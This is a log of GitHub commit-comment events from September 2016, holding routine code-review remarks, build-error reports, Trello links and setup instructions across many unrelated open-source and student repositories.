{"id":"4518345193","type":"CommitCommentEvent","actor":{"login":"PaulaRudy"},"repo":{"name":"PaulaRudy/FSON"},"payload":{"comment":{"id":18903777,"position":null,"line":null,"path":null,"commit_id":"052ed22ed345b812b3d445e7fdc21f3404e96c84","created_at":"2016-09-05T21:10:18Z","updated_at":"2016-09-05T21:10:18Z","body":"See issue #17 "}},"created_at":"2016-09-05T21:10:18Z"}
{"id":"4518345285","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18903778,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-05T21:10:20Z","updated_at":"2016-09-05T21:10:20Z","body":"I ran many tests today. \r\n\r\nMy test version is way too slow (-1.1 %) \r\nbut I was running against master = test with params 0, so speed was not a factor (for now).\r\n(btw snicolet version is almost same speed as master)\r\n\r\nAs expected, I was not able to find a way to plug this into pawns.cpp.\r\n\r\nIn evaluate_initiative I tried some versions where I do\r\ninitiative += x * (groupt_count(~strongside) - groupt_count(strongside));\r\n\r\nand tested with all x =4, 6, 8, and 10\r\n\r\nI'm not using abs().\r\nAnother option would be to score it only once\r\n\r\nI will put this aside for a few days :(\r\n\r\n"}},"created_at":"2016-09-05T21:10:20Z"}
{"id":"4518347523","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903781,"position":null,"line":null,"path":null,"commit_id":"a761da115acbf70601e85f9e4b849a42d845b77a","created_at":"2016-09-05T21:11:27Z","updated_at":"2016-09-05T21:11:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#DQXy95FwQb6qBno5t0zXHA"}},"created_at":"2016-09-05T21:11:27Z"}
{"id":"4518350131","type":"CommitCommentEvent","actor":{"login":"timattox"},"repo":{"name":"lammps/lammps"},"payload":{"comment":{"id":18903788,"position":null,"line":null,"path":null,"commit_id":"222e9de4c88908c0ce3f10d658830256f8045d3e","created_at":"2016-09-05T21:12:44Z","updated_at":"2016-09-05T21:12:44Z","body":"Correction, my manual git bisecting was in error.  The offending commit was 2af907a10d948a8d40e9e5d6810514c51ef281cc\r\nwhich makes sense."}},"created_at":"2016-09-05T21:12:44Z"}
{"id":"4518350608","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18903789,"position":null,"line":null,"path":null,"commit_id":"a1fd39202cb0b450360e0450e683bb89af8e5ad4","created_at":"2016-09-05T21:12:57Z","updated_at":"2016-09-05T21:12:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;hSA037Ii&#x2F;1-add-unit-tests-task-to-build\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add unit tests task to build</a>"}},"created_at":"2016-09-05T21:12:57Z"}
{"id":"4518351370","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18903792,"position":31,"line":203,"path":"source/game/ai/aas.cpp","commit_id":"32b42d72903bd268aa2ac464e02b8b9949bc3ca2","created_at":"2016-09-05T21:13:19Z","updated_at":"2016-09-05T21:13:19Z","body":"It has been removed many weeks ago, and also wasting 8 bytes is required for malloc-like functions alignment contract.\r\nWe assume that G_Malloc returns at least 8-byte aligned chunks, actually 16-byte aligned ones, and we should provide at least 8-byte aligned chunk to a caller."}},"created_at":"2016-09-05T21:13:19Z"}
{"id":"4518351752","type":"CommitCommentEvent","actor":{"login":"stefek99"},"repo":{"name":"trinketmage/three.js-vr-hud"},"payload":{"comment":{"id":18903794,"position":66,"line":66,"path":"example/libs/controls.js","commit_id":"ca67bf6673a5f03487d654e7ed0e5e092a957a9f","created_at":"2016-09-05T21:13:31Z","updated_at":"2016-09-05T21:13:31Z","body":"It doesn't seem to be ever defined... Weird."}},"created_at":"2016-09-05T21:13:31Z"}
{"id":"4518354369","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18903797,"position":7,"line":150,"path":"source/game/ai/ai.h","commit_id":"d4f03c1dfeec79292c2c9d1f3a410e69f11b16f2","created_at":"2016-09-05T21:14:51Z","updated_at":"2016-09-05T21:14:51Z","body":"Wil be fixed when I redo some parts of AS exports."}},"created_at":"2016-09-05T21:14:51Z"}
{"id":"4518361596","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18903801,"position":61,"line":95,"path":"source/game/ai/ai.h","commit_id":"ed865834fcb836a0be04895d27e7aba3463d76b7","created_at":"2016-09-05T21:18:25Z","updated_at":"2016-09-05T21:18:25Z","body":"Should be `ClearOverriddenEntityWeights()`, `OverrideInternalEntityWeightBy()`"}},"created_at":"2016-09-05T21:18:25Z"}
{"id":"4518361937","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18903802,"position":14,"line":135,"path":"static/js/controllers/contacts.js","commit_id":"9a62fc5ea02d3493ea6ab7e5b765721e8e07a994","created_at":"2016-09-05T21:18:35Z","updated_at":"2016-09-05T21:18:35Z","body":"Don't use `instant` - if it runs too soon the label won't be translated. Async is fine here, so use `$translate(...).then(...)`"}},"created_at":"2016-09-05T21:18:35Z"}
{"id":"4518364400","type":"CommitCommentEvent","actor":{"login":"alfredosalas"},"repo":{"name":"afmontanar/xbaseSqlAdi"},"payload":{"comment":{"id":18903803,"position":null,"line":null,"path":null,"commit_id":"98553983712fa21ef345e1ab403aee30d2a8fbd6","created_at":"2016-09-05T21:19:53Z","updated_at":"2016-09-05T21:19:53Z","body":"cuando el postgres no permita crear extensiones, hay q actualizar el encoding a utf8\r\nupdate pg_database set encoding=8 where datname='adicnet';"}},"created_at":"2016-09-05T21:19:53Z"}
{"id":"4518365181","type":"CommitCommentEvent","actor":{"login":"VeronikaA"},"repo":{"name":"LaunchCodeEducation/flicklist"},"payload":{"comment":{"id":18903805,"position":null,"line":null,"path":null,"commit_id":"8ffb0fb0f0616c0b2523f017bf5cf231c43db4c1","created_at":"2016-09-05T21:20:15Z","updated_at":"2016-09-05T21:20:15Z","body":"\r\n\r\nvar api = {\r\n\troot: \"https://api.themoviedb.org/3\",\r\n\t\r\n\ttoken: \"792528da886dc1abe881496296beae52\" // TODO put your api key here\r\n}\r\n\r\n/**\r\n * Makes an AJAX request to themoviedb.org, asking for some movies\r\n * if successful, prints the results to the console\r\n */\r\nfunction testTheAPI() {\r\n\t$.ajax({\r\n\t\turl: api.root + \"/discover/movie\",\r\n\t\tdata: {\r\n\t\t\tapi_key: api.token,\r\n\t\t},\r\n\t\tsuccess: function(response) {\r\n\t\t\tconsole.log(\"We got a response from The Movie DB!\");\r\n\t\t\tconsole.log(response);\r\n\t\t}\r\n\t});\r\n}\r\n\r\n\r\nconsole.log(\"The script loaded!\");\r\ntestTheAPI();\r\n"}},"created_at":"2016-09-05T21:20:15Z"}
{"id":"4518365605","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18903806,"position":14,"line":135,"path":"static/js/controllers/contacts.js","commit_id":"9a62fc5ea02d3493ea6ab7e5b765721e8e07a994","created_at":"2016-09-05T21:20:28Z","updated_at":"2016-09-05T21:20:28Z","body":"Also, instead of concatenating the label consider using a switch to return the full label's string. Concatenating the string makes finding in use labels very difficult (#2711)."}},"created_at":"2016-09-05T21:20:28Z"}
{"id":"4518368885","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18903811,"position":24,"line":187,"path":"static/js/controllers/contacts.js","commit_id":"9a62fc5ea02d3493ea6ab7e5b765721e8e07a994","created_at":"2016-09-05T21:22:10Z","updated_at":"2016-09-05T21:22:10Z","body":"Same comments as above. Don't use `instant` and don't concatenate labels."}},"created_at":"2016-09-05T21:22:10Z"}
{"id":"4518369814","type":"CommitCommentEvent","actor":{"login":"michalwiglasz"},"repo":{"name":"mergado/sklik-api-client-python"},"payload":{"comment":{"id":18903814,"position":null,"line":null,"path":null,"commit_id":"bc4cda71f0c006fa9d2d08a6ff25a2673e9a6bf2","created_at":"2016-09-05T21:22:38Z","updated_at":"2016-09-05T21:22:38Z","body":"Nebyl by u chunks lepsi generator? Tj. kulate zavorky misto hranatych."}},"created_at":"2016-09-05T21:22:38Z"}
{"id":"4518370785","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/configuration"},"payload":{"comment":{"id":18903815,"position":null,"line":null,"path":null,"commit_id":"75b23fd273e628e6a7bddeb6a3c88197849e64a3","created_at":"2016-09-05T21:23:10Z","updated_at":"2016-09-05T21:23:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;abtslNZw&#x2F;423-2-nyif-and-appsembler-sales-automate-nginx-config-necessary-for-scorm-xblock-in-the-new-scorm-role\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (2) NYIF and Appsembler Sales: Automate Nginx config necessary for SCORM XBlock in the new SCORM role</a>"}},"created_at":"2016-09-05T21:23:10Z"}
{"id":"4518371477","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/configuration"},"payload":{"comment":{"id":18903818,"position":null,"line":null,"path":null,"commit_id":"de0eb42a1ae0f638b2b67bd97f690c461efaaa3d","created_at":"2016-09-05T21:23:28Z","updated_at":"2016-09-05T21:23:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;abtslNZw&#x2F;423-2-nyif-and-appsembler-sales-automate-nginx-config-necessary-for-scorm-xblock-in-the-new-scorm-role\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (2) NYIF and Appsembler Sales: Automate Nginx config necessary for SCORM XBlock in the new SCORM role</a>"}},"created_at":"2016-09-05T21:23:28Z"}
{"id":"4518371754","type":"CommitCommentEvent","actor":{"login":"christo4ferris"},"repo":{"name":"iamsaurabhc/learn-chaincode"},"payload":{"comment":{"id":18903819,"position":null,"line":null,"path":null,"commit_id":"bf387ec965a1381ab21c209a0422ea5de5ed7ab6","created_at":"2016-09-05T21:23:35Z","updated_at":"2016-09-05T21:23:35Z","body":"This sample/tutorial requires use of the v0.5-developer-preview release [here](https://github.com/hyperledger-archives/fabric/tree/v0.5-developer-preview). The project has been re-organizing since that release, but basically, if you clone that repo and checkout the v0.5-developer-preview branch, that will be consistent with this tutorial.\r\n\r\nStep 2 in the instructions should be:\r\nAdd the Hyperledger shim code to your Go workspace (which you set as the value of $GOPATH) by opening a command prompt or terminal and entering the following:\r\n\r\ncd $GOPATH\r\nmkdir -p src/github.com/hyperledger/\r\ncd src/github.com/hyperledger/\r\ngit clone https://github.com/hyperledger-archives/fabric.git\r\ncd fabric\r\ngit checkout v0.5-developer-preview"}},"created_at":"2016-09-05T21:23:35Z"}
{"id":"4518373210","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18903821,"position":null,"line":null,"path":null,"commit_id":"01fe8eec3ccd293256e78efd9134322d3846e86f","created_at":"2016-09-05T21:24:19Z","updated_at":"2016-09-05T21:24:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4LbcZdDE&#x2F;22-gulp-and-rename-classes\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Gulp and rename classes</a>"}},"created_at":"2016-09-05T21:24:19Z"}
{"id":"4518373823","type":"CommitCommentEvent","actor":{"login":"vwilliam"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18903824,"position":null,"line":null,"path":null,"commit_id":"27d27f5040ec151804789f2ce42d02ea834b0966","created_at":"2016-09-05T21:24:40Z","updated_at":"2016-09-05T21:24:40Z","body":"Je pense que je dois m'embrouiller entre les \"replace with\" et les \"rebase\" ou .\r\nTu peux me donner la séquence pour récupérer toutes les modifs avant de travailler et commiter.\r\n"}},"created_at":"2016-09-05T21:24:40Z"}
{"id":"4518373860","type":"CommitCommentEvent","actor":{"login":"rwalkos"},"repo":{"name":"uEssentials/uEssentials"},"payload":{"comment":{"id":18903825,"position":null,"line":null,"path":null,"commit_id":"572cf5b11f38acb3210ff32e284c465d6708eac4","created_at":"2016-09-05T21:24:41Z","updated_at":"2016-09-05T21:24:41Z","body":"Is there a way, or plans, to be able to send requesturl to all players on the server at once, or when they first log in?"}},"created_at":"2016-09-05T21:24:41Z"}
{"id":"4518373895","type":"CommitCommentEvent","actor":{"login":"vgmoose"},"repo":{"name":"dimok789/homebrew_launcher"},"payload":{"comment":{"id":18903826,"position":106,"line":106,"path":"src/gui/GuiImageData.cpp","commit_id":"614771d8692827b417e5a4664fec83b48f053607","created_at":"2016-09-05T21:24:43Z","updated_at":"2016-09-05T21:24:43Z","body":"Why's this line commented out in HBL but not [in loadiine](https://github.com/dimok789/loadiine_gx2/blob/2e6a216b9fb7c6d5722dd71048f0d73864aa649f/src/gui/GuiImageData.cpp#L106)! 😭 \r\n\r\nLeftover from debugging?"}},"created_at":"2016-09-05T21:24:43Z"}
{"id":"4518375962","type":"CommitCommentEvent","actor":{"login":"Kojoley"},"repo":{"name":"boostorg/variant"},"payload":{"comment":{"id":18903829,"position":null,"line":null,"path":null,"commit_id":"9342505270e6e0b9396937466a6fb803186827fd","created_at":"2016-09-05T21:25:45Z","updated_at":"2016-09-05T21:25:45Z","body":"msvc 8.0-10.0 does not work with the change\r\n```\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<move_only_structure>' : must return a value\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<bool>' : must return a value\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<int>' : must return a value\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<boost::blank & __ptr64>' : must return a value\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<swap_ambiguouty_test_ns::A & __ptr64>' : must return a value\r\nboost\\variant\\detail\\forced_return.hpp(51) : error C4716: 'boost::detail::variant::forced_return<swap_ambiguouty_test_ns::B & __ptr64>' : must return a value\r\n```\r\nLog from http://www.boost.org/development/tests/develop/developer/output/teeks99-09c-win2012R2-64on64-boost-bin-v2-libs-variant-test-rvalue_test-test-msvc-10-0-dbg-adrs-mdl-64-async-excpt-on-thrd-mlt.html\r\n\r\nThe problem should be because of `abort` which is not marked with `__declspec(noreturn)`\r\nhttps://stackoverflow.com/questions/3569643/abort-is-not-declspecnoreturn-in-vs2010 in msvc 10 and previous versions."}},"created_at":"2016-09-05T21:25:45Z"}
{"id":"4518377432","type":"CommitCommentEvent","actor":{"login":"leonardosnt"},"repo":{"name":"uEssentials/uEssentials"},"payload":{"comment":{"id":18903834,"position":null,"line":null,"path":null,"commit_id":"572cf5b11f38acb3210ff32e284c465d6708eac4","created_at":"2016-09-05T21:26:31Z","updated_at":"2016-09-05T21:26:31Z","body":"/requrl * foo bar.com"}},"created_at":"2016-09-05T21:26:31Z"}
{"id":"4518378492","type":"CommitCommentEvent","actor":{"login":"DaVinci789"},"repo":{"name":"disorientedperson/python-adventure-game"},"payload":{"comment":{"id":18903838,"position":null,"line":null,"path":null,"commit_id":"0a37353f9728221f0237e783792767e0c77552d1","created_at":"2016-09-05T21:27:02Z","updated_at":"2016-09-05T21:27:02Z","body":"Nice."}},"created_at":"2016-09-05T21:27:02Z"}
{"id":"4518379626","type":"CommitCommentEvent","actor":{"login":"fulcorno"},"repo":{"name":"fulcorno/porto-tools"},"payload":{"comment":{"id":18903840,"position":null,"line":null,"path":null,"commit_id":"1ae0358e93aa60da8935e9d2ef2d98dd79846c0f","created_at":"2016-09-05T21:27:39Z","updated_at":"2016-09-05T21:27:39Z","body":"A fist version of `scarica.py` for the e-lite web site. @luigidr, you may have a look"}},"created_at":"2016-09-05T21:27:39Z"}
{"id":"4518380945","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18903842,"position":4,"line":79,"path":"tests/karma/unit/controllers/contacts.js","commit_id":"9a62fc5ea02d3493ea6ab7e5b765721e8e07a994","created_at":"2016-09-05T21:28:21Z","updated_at":"2016-09-05T21:28:21Z","body":"Use `assert.equals` here otherwise you're not checking that you're concatenating the right strings on. eg: \"wrong.key.but.still.passes.childType.woo\" will pass this assertion. Generally be as strict as you can in unit tests and hardcode strings where you expect the unit to always return the same thing."}},"created_at":"2016-09-05T21:28:21Z"}
{"id":"4518381307","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18903844,"position":21,"line":118,"path":"tests/karma/unit/controllers/contacts.js","commit_id":"9a62fc5ea02d3493ea6ab7e5b765721e8e07a994","created_at":"2016-09-05T21:28:31Z","updated_at":"2016-09-05T21:28:31Z","body":"As above - check the entire label."}},"created_at":"2016-09-05T21:28:31Z"}
{"id":"4518381572","type":"CommitCommentEvent","actor":{"login":"ocefpaf"},"repo":{"name":"conda-forge/staged-recipes"},"payload":{"comment":{"id":18903845,"position":5,"line":38,"path":"recipes/llvmdev38/build.sh","commit_id":"6c62fb9b0304488ce2b1d95116914a7919ede008","created_at":"2016-09-05T21:28:41Z","updated_at":"2016-09-05T21:28:41Z","body":"It is interesting that `8` is working in `Travis-CI`. I will try to find any docs to see what they offer but last time I checker I could not find any info about 8 cores."}},"created_at":"2016-09-05T21:28:41Z"}
{"id":"4518381666","type":"CommitCommentEvent","actor":{"login":"JerJohn15"},"repo":{"name":"JerJohn15/laverna"},"payload":{"comment":{"id":18903847,"position":null,"line":null,"path":null,"commit_id":"e05d03637d46b7ab1e9fefa8226a649f14d9b823","created_at":"2016-09-05T21:28:44Z","updated_at":"2016-09-05T21:28:44Z","body":"The search bar now appears below the header when the user clicks the search button.  "}},"created_at":"2016-09-05T21:28:44Z"}
{"id":"4518383883","type":"CommitCommentEvent","actor":{"login":"afmontanar"},"repo":{"name":"afmontanar/xbaseSqlAdi"},"payload":{"comment":{"id":18903851,"position":null,"line":null,"path":null,"commit_id":"98553983712fa21ef345e1ab403aee30d2a8fbd6","created_at":"2016-09-05T21:29:51Z","updated_at":"2016-09-05T21:29:51Z","body":"no sirvio la actualizacion"}},"created_at":"2016-09-05T21:29:51Z"}
{"id":"4518383977","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18903852,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-05T21:29:54Z","updated_at":"2016-09-05T21:29:54Z","body":"Same here :-( but will very likely experiment with pawns.cpp stuff (including misc algorithms) soon!"}},"created_at":"2016-09-05T21:29:54Z"}
{"id":"4518384531","type":"CommitCommentEvent","actor":{"login":"atarallo"},"repo":{"name":"lyndell/TECMINT_MONITOR"},"payload":{"comment":{"id":18903853,"position":null,"line":null,"path":null,"commit_id":"c14481bfbf1273856c010376ece836e79d70fc55","created_at":"2016-09-05T21:30:11Z","updated_at":"2016-09-05T21:30:11Z","body":"I think I'll be adding your code snippet on Development Branch. "}},"created_at":"2016-09-05T21:30:11Z"}
{"id":"4518387255","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18903856,"position":null,"line":null,"path":null,"commit_id":"d3b7f4e4c3982042fd5f60e0e48c336b386cb323","created_at":"2016-09-05T21:31:28Z","updated_at":"2016-09-05T21:31:28Z","body":"Just download as a ZIP and install in the Bitwig controller script directory.\r\n\r\n**Windows**\r\n%USERPROFILE%\\Documents\\Bitwig Studio\\Controller Scripts\\\r\n\r\n**Mac**\r\n~/Documents/Bitwig Studio/Controller Scripts/\r\n\r\n**Linux**\r\n~/Bitwig Studio/Controller Scripts/\r\n\r\n\r\nIn the settings you can set what midi device script should be used (Don't really know if bitwig autodetects yet). Then you just set the OP-1 to the ctrl mode by holding \r\n\r\n`shift + com`\r\n\r\nand then selecting CTRL.\r\n\r\nyou can set the different modes by tapping on the synth/drums/tape/mixer buttons.\r\n\r\n\r\nI'll add some better documentation when i get to work on it some more. If you got any ideas for mapping the keys just let me know.\r\n\r\nI hope this helps a bit.\r\n\r\n@mpiecora "}},"created_at":"2016-09-05T21:31:28Z"}
{"id":"4518387359","type":"CommitCommentEvent","actor":{"login":"jhofstee"},"repo":{"name":"victronenergy/linux"},"payload":{"comment":{"id":18903857,"position":null,"line":null,"path":null,"commit_id":"0f6681ecd2d6af5109d24ce25ec871bc0e934e3b","created_at":"2016-09-05T21:31:32Z","updated_at":"2016-09-05T21:31:32Z","body":"whatever the patch does, make sure to checkpatch it before posting, is has whitespace issues..."}},"created_at":"2016-09-05T21:31:32Z"}
{"id":"4518388605","type":"CommitCommentEvent","actor":{"login":"pyrodie18"},"repo":{"name":"pyrodie18/Bro-Analysis"},"payload":{"comment":{"id":18903859,"position":null,"line":null,"path":null,"commit_id":"edc5b22fe55d1da27af6c17e35b2b195bfb8cc99","created_at":"2016-09-05T21:32:12Z","updated_at":"2016-09-05T21:32:12Z","body":"In response to Issue [13](https://github.com/pyrodie18/Bro-Analysis/issues/13)"}},"created_at":"2016-09-05T21:32:12Z"}
{"id":"4518391861","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903865,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T21:33:53Z","updated_at":"2016-09-05T21:33:53Z","body":"@maziminke You are very welcome to suggest a patch that fixes this in a backward compatible way."}},"created_at":"2016-09-05T21:33:53Z"}
{"id":"4518392136","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"qpfiffer/shithouse.tv"},"payload":{"comment":{"id":18903866,"position":null,"line":null,"path":null,"commit_id":"3d4f6322af91effa3e49705a6d1b3d96de2b7ab5","created_at":"2016-09-05T21:34:04Z","updated_at":"2016-09-05T21:34:04Z","body":":police_car: \r\n:oncoming_police_car: \r\n:cop: `do you hav  a permit for that patch`"}},"created_at":"2016-09-05T21:34:04Z"}
{"id":"4518392993","type":"CommitCommentEvent","actor":{"login":"DreadDave"},"repo":{"name":"DreadDave/experi_mental"},"payload":{"comment":{"id":18903867,"position":null,"line":null,"path":null,"commit_id":"2002a1cb1fbaaa96b128032646cbef9283e3b3a9","created_at":"2016-09-05T21:34:31Z","updated_at":"2016-09-05T21:34:31Z","body":"And so it begins..."}},"created_at":"2016-09-05T21:34:31Z"}
{"id":"4518395165","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903869,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T21:35:36Z","updated_at":"2016-09-05T21:35:36Z","body":"@Shnoulle The problem here was in fact the HTML, not the CSS."}},"created_at":"2016-09-05T21:35:36Z"}
{"id":"4518395865","type":"CommitCommentEvent","actor":{"login":"PhilippSpo"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":18903870,"position":56,"line":56,"path":"src/types.js","commit_id":"0a0d752c5c94b9f5dfcd8e64531c6640a6153d97","created_at":"2016-09-05T21:35:58Z","updated_at":"2016-09-05T21:35:58Z","body":"If we want to keep them flexible and not predefined we need to keep it this way, I think."}},"created_at":"2016-09-05T21:35:58Z"}
{"id":"4518400750","type":"CommitCommentEvent","actor":{"login":"jonsherrard"},"repo":{"name":"shortlist-digital/agreable-product-plugin"},"payload":{"comment":{"id":18903873,"position":4,"line":9,"path":"src/stylus/product-list/style.styl","commit_id":"92eece52e1a5e0d91d4c85047984f5f2c983b039","created_at":"2016-09-05T21:38:26Z","updated_at":"2016-09-05T21:38:26Z","body":"@ecoad Should be overflow-y hidden"}},"created_at":"2016-09-05T21:38:26Z"}
{"id":"4518402614","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18903880,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"1b97735d6874cb35776f2dc4033e841f38397b9b","created_at":"2016-09-05T21:39:26Z","updated_at":"2016-09-05T21:39:26Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-05T21:39:26Z"}
{"id":"4518402650","type":"CommitCommentEvent","actor":{"login":"rushil-patel"},"repo":{"name":"rohan-varma/house-predict-nn"},"payload":{"comment":{"id":18903881,"position":25,"line":17,"path":"parse_file.py","commit_id":"9379b2771b4540cdec5360989df1e9f45692b95a","created_at":"2016-09-05T21:39:27Z","updated_at":"2016-09-05T21:39:27Z","body":"for item in li:\r\n   .....\r\n"}},"created_at":"2016-09-05T21:39:27Z"}
{"id":"4518403360","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18903884,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"1b97735d6874cb35776f2dc4033e841f38397b9b","created_at":"2016-09-05T21:39:52Z","updated_at":"2016-09-05T21:39:52Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-05T21:39:52Z"}
{"id":"4518403371","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18903885,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"1b97735d6874cb35776f2dc4033e841f38397b9b","created_at":"2016-09-05T21:39:52Z","updated_at":"2016-09-05T21:39:52Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-05T21:39:52Z"}
{"id":"4518403868","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"qpfiffer/shithouse.tv"},"payload":{"comment":{"id":18903887,"position":null,"line":null,"path":null,"commit_id":"f7bc9078a1e289bcec0535e3d5ee018a7ddca143","created_at":"2016-09-05T21:40:10Z","updated_at":"2016-09-05T21:40:10Z","body":":dragon_face: `u have gatherd the dragon balls`\r\n:dragon: `a shithouse will be hosted in ur honor`\r\n:sparkles: "}},"created_at":"2016-09-05T21:40:10Z"}
{"id":"4518404518","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903888,"position":null,"line":null,"path":null,"commit_id":"4c1a251c7a5c603e2ca987335b2f1ce4197f3820","created_at":"2016-09-05T21:40:29Z","updated_at":"2016-09-05T21:40:29Z","body":"Will that event even be necessary after we've done question objects?"}},"created_at":"2016-09-05T21:40:29Z"}
{"id":"4518404678","type":"CommitCommentEvent","actor":{"login":"afmontanar"},"repo":{"name":"afmontanar/xbaseSqlAdi"},"payload":{"comment":{"id":18903889,"position":null,"line":null,"path":null,"commit_id":"98553983712fa21ef345e1ab403aee30d2a8fbd6","created_at":"2016-09-05T21:40:34Z","updated_at":"2016-09-05T21:40:34Z","body":"LC_COLLATE = 'Spanish_Spain.1252'\r\n       LC_CTYPE = 'Spanish_Spain.1252'\r\n       "}},"created_at":"2016-09-05T21:40:34Z"}
{"id":"4518405717","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18903892,"position":null,"line":null,"path":null,"commit_id":"00d9b7a733111965409fc2355f1f03589048cdc6","created_at":"2016-09-05T21:41:08Z","updated_at":"2016-09-05T21:41:08Z","body":"Awesome! This will help a lot of ppl with transfer issues. Thank you!"}},"created_at":"2016-09-05T21:41:08Z"}
{"id":"4518405904","type":"CommitCommentEvent","actor":{"login":"aignatius3"},"repo":{"name":"GT-CS2340-TheGoGitters/M2"},"payload":{"comment":{"id":18903894,"position":null,"line":null,"path":null,"commit_id":"fbd3f2e4488584d7a18f01d94f53a5b4b3732a12","created_at":"2016-09-05T21:41:13Z","updated_at":"2016-09-05T21:41:13Z","body":"I complete the calc(String input) name in Person1.java. The method takes the string and returns the string's characters rotated 2 positions. "}},"created_at":"2016-09-05T21:41:13Z"}
{"id":"4518407454","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18903896,"position":157,"line":157,"path":"lib/lexer.js","commit_id":"49a11ff16ff2ac88f3da2677e414f070b63898ab","created_at":"2016-09-05T21:42:05Z","updated_at":"2016-09-05T21:42:05Z","body":"Seems the same as `.keep`? Sorry if it's fixed in any next commits. Just reviewing."}},"created_at":"2016-09-05T21:42:05Z"}
{"id":"4518410235","type":"CommitCommentEvent","actor":{"login":"1u"},"repo":{"name":"schuel/hmmm"},"payload":{"comment":{"id":18903900,"position":9,"line":75,"path":"client/views/frames/calendar/frame.calendar.js","commit_id":"47a3fd18bd7b816ce100d224b875ecd5af659332","created_at":"2016-09-05T21:43:34Z","updated_at":"2016-09-05T21:43:34Z","body":"oups"}},"created_at":"2016-09-05T21:43:34Z"}
